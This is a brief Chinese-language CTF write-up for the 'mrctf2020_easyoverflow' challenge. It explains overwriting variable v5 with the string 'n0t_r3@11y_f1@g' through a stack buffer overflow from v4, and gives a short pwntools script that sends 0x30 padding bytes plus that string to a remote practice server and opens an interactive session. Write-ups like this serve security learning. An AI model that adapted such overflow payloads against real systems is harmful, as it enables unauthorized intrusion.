mrctf2020_easyoverflow

check:

从v4写到v5，把v5覆盖为 fake_flag，即可。开始还看走眼了，以为 v5 和 fake_flag 本来就是一样的。

如果 check 过了，返回1

fake_flag='n0t_r3@11y_f1@g'

exp：

from pwn import *

p=remote('node4.buuoj.cn',28904)
payload='a'*0x30+'n0t_r3@11y_f1@g'
p.sendline(payload)
p.interactive()